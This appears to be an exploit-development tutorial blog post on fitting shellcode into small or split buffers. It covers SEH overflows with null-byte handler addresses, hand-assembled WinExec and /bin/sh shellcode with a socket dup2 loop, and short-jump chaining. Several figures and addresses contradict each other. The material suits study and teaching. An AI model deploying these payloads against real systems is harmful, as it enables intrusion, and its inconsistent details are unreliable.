Shellcode Under Constraints · Steven Foerster

Real-world exploit development rarely offers the luxury of a 500-byte contiguous buffer with no bad characters. More often you’re working within tight limits — a 68-byte window, a null byte that truncates your payload, or a firewall that blocks your reverse shell. These constraints force creative solutions.

The Null Byte Problem in SafeSEH Bypass

When exploiting an SEH overflow on Windows, you need a POP POP RET gadget from a module without SafeSEH. Sometimes the only viable candidate has a null byte in its address:

Found CALL DWORD PTR SS:[EBP+30] at 0x00280B0B [none]
** Null byte ** PAGE_READONLY

The address 0x00280B0B starts with a null byte. In little-endian, the packed address is \x0b\x0b\x28\x00 — the null byte is at the end. This means strcpy and similar functions will write the full address, but nothing after it gets copied into the buffer.

This has a cascading effect on payload design:

Normal SEH exploit layout:
| Junk | nSEH (jmp) | SEH (POP POP RET) | NOP sled | Shellcode |
  N bytes    4 bytes       4 bytes           ~50 B      ~300 B

With null byte in SEH address:
| Junk | nSEH (jmp) | SEH (POP POP RET\x00) |  ← everything stops here
  N bytes    4 bytes       4 bytes

The shellcode must go before the SEH overwrite, not after. With the SEH handler at offset 68, that gives you approximately 68 bytes for the entire payload: NOP sled, shellcode, and all.

Hand-Crafted Shellcode for Tight Spaces

With ~68 bytes, msfvenom’s encoded output (typically 200+ bytes) won’t fit. You need hand-crafted, minimal shellcode.

WinExec in 30 Bytes

A minimal WinExec("calc.exe", 1) shellcode:

sc = b"\x90"                            # NOP (landing pad)
sc += b"\x33\xDB"                       # xor ebx, ebx
sc += b"\x53"                           # push ebx (null terminator)
sc += b"\x68\x2e\x65\x78\x65"          # push ".exe"
sc += b"\x68\x63\x61\x6c\x63"          # push "calc"
sc += b"\x8B\xCC"                       # mov ecx, esp (ptr to "calc.exe")
sc += b"\x6A\x01"                       # push 1 (SW_SHOWNORMAL)
sc += b"\x51"                           # push ecx (lpCmdLine)
sc += b"\xBB\xAD\x23\x86\x7C"          # mov ebx, 0x7C8623AD (WinExec addr)
sc += b"\xFF\xD3"                       # call ebx

Every byte is accounted for. No encoder, no NOP sled, no room for error. The WinExec address (0x7C8623AD) is obtained from mona’s Assemble window or by resolving it with arwin:

!mona find -s "Call kernel32.WinExec"

The Budget

With this shellcode occupying ~30 bytes, the remaining ~38 bytes in the 68-byte window hold:

| NOP sled (~22 B) | Shellcode (~30 B) | nSEH (4 B) | SEH (4 B) | \x00 (truncated) |
      ↑                                      ↑
   Landing zone                          Short jmp back

nSEH contains a short jump backwards (\xeb\xd2\x90\x90) to land in the NOP sled before the shellcode. It’s tight, but it works.

When Egghunters Don’t Save You

An egghunter is usually the answer for small buffers: place a ~32-byte egghunter in the limited space and the full shellcode elsewhere in memory. But this requires two things:

A second input vector to place the larger shellcode somewhere in the process’s address space (another field, a socket recv, a file read, an environment variable)
Enough space for the egghunter itself plus the SEH/nSEH overhead

If neither condition is met — for example, a local file-based exploit with a single input and only 68 bytes of controlled space — the egghunter approach doesn’t help. You’re stuck fitting everything in the primary buffer.

The Constraint Cascade

When multiple mitigations combine with limited space, the constraints compound:

Mitigation	Space Cost	Effect
SafeSEH bypass (null byte)	Lose everything after offset 68	Shellcode must precede SEH
nSEH short jump	4 bytes	Eats into buffer
SEH handler address	4 bytes	Eats into buffer
DEP	Need ROP chain (~60+ bytes)	Won’t fit in remaining ~60 bytes

Adding DEP to the mix makes this configuration effectively unexploitable with the available gadgets. A ROP chain to bypass DEP typically needs 60-100+ bytes, and there’s no room alongside the shellcode. Recognizing this dead end early saves time.

Splitting Shellcode Across Gaps

When the buffer is large enough overall but not contiguous, shellcode can be divided into independent chunks connected by short jumps.

Consider a remote service where strcpy writes to buffers spaced 0x40 bytes apart in memory:

0xf74005d0: [chunk 1 -- 36 bytes usable]
0xf74005f0: [gap -- zeroed memory]
0xf7400610: [chunk 2 -- 36 bytes usable]
0xf7400630: [gap -- zeroed memory]
0xf7400650: [chunk 3 -- 36 bytes usable]

Each chunk ends with a short jump (\xeb\x2a) to skip the gap and land at the start of the next chunk:

# Chunk 1: dup2 loop (redirect fd 0,1,2 to socket)
chunk1  = b"\x31\xc0"              # xor eax, eax
chunk1 += b"\x31\xdb"              # xor ebx, ebx
chunk1 += b"\x80\xc3\x04"          # add bl, 4 (socket fd)
chunk1 += b"\xb0\x3f\x49\xcd\x80"  # dup2 syscall loop
chunk1 += b"\x85\xc0\x75\xf7"      # jnz loop
chunk1 += b"\xeb\x2a"              # short jump → chunk 2

# Chunk 2: execve("/bin/sh")
chunk2  = b"\x50"                  # push eax (null)
chunk2 += b"\x68\x2f\x2f\x73\x68"  # push "//sh"
chunk2 += b"\x68\x2f\x62\x69\x6e"  # push "/bin"
chunk2 += b"\x89\xe3\x50\x53"      # setup argv
chunk2 += b"\x89\xe1\x99"          # ecx, edx
chunk2 += b"\xb0\x0b\xcd\x80"      # execve

The key rule: split at points with no cross-boundary jumps. The dup2 loop’s jnz jumps backwards within chunk 1, which is fine. The \xeb\x2a at the end is the only forward jump, and it targets the start of chunk 2.

Calculating Jump Distances

The short jump instruction \xeb\xNN jumps NN bytes forward from the instruction after the jump (since the CPU has already advanced past the 2-byte instruction):

Chunk 1 ends at:    0xf74005e8 (after \xeb\x2a)
Next instruction:   0xf74005ea (this is where the offset is measured from)
Chunk 2 starts at:  0xf7400614
Distance:           0x614 - 0x5ea = 0x2a (42 bytes)

So \xeb\x2a is correct. Always verify with GDB — off-by-one errors here mean jumping into the middle of an instruction or into the zeroed gap.

General Principles

Know your byte budget — Before writing any shellcode, map out exactly how many bytes are available and where they can go
Hand-craft when space is tight — Encoders and generators add overhead; manual assembly can save 50-70% of the space
Null bytes cascade — A single null byte in a critical address can reshape the entire exploit layout
Mitigations compound — Each protection eats into your available space; combinations can be unexploitable with a given approach
Recognize dead ends — If the math doesn’t add up (ROP chain + shellcode > available space), pivot to a different strategy rather than forcing it
Short jumps bridge gaps — Discontinuous buffers are workable as long as the gaps are within 127 bytes and the shellcode splits cleanly